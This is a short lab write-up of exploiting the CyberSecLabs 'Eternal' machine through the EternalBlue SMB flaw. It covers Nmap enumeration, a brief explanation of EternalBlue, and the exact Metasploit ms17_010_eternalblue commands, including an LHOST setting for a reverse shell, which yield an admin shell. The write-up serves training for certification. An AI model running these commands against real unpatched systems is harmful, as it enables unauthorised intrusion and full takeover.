CybersecLabs- Eternal
This is my 10th write up and I will be discussing my experience with the machine “eternal” from CyberSecLabs. CyberSecLabs is a great platform, for people who are starting out with penetration testing and want to sharpen their skills to take on the OSCP. Eternal was a super easy machine, the name gave it all away by running a scan to check for an eternal blue vulnerability which lead to a successful exploit.
Step 1: Enumeration
I started off with an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for second scan type. It does not hurt to run two different type of Nmap scans because one scan may give you more than the other. The scan used default scripts -sC and version detection -sV
I always start from top to bottom when reading the scan results but in this case port 445 stuck out like a thumb, not to mention the version exposed. The name of the box gave this one all away so I kicked off an nmap eternal blue vulnerability scan to check if it was vulnerable.
What is the Eternal Blue Vulnerability?
It was tool developed by the NSA and it was leaked by “The Shadow Brokers” group.
EternalBlue works on all Windows versions prior to Windows 8. These versions contain an interprocess communication share (IPC$) that allows a null session. This means that the connection is established via anonymous login and null session is allowed by default. Null session allows the client to send different commands to the server.
Step 2: Exploitation
Sure enough, I got the scan result back as “VULNERABLE”. I fired up searchsploit and looked up ms17–010 and saw a couple of results. If you see ones that end in .rb we know that metasploit usually has a module for them available. The .py ones for python are usually the manual exploits which take some time but you learn a lot from them.
I tried going with the manual exploit but had no luck with getting piped names and a set of valid credentials for it to work so I went with the metasploit module.
I ran the following commands on my kali machine:
sudo msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset RHOSTS 172.31.1.10set LHOST id your ip hererun
I received a shell with full admin privileges…. God that was way too easy…and the scary part is that there are some computers out there still vulnerable to this exploit.
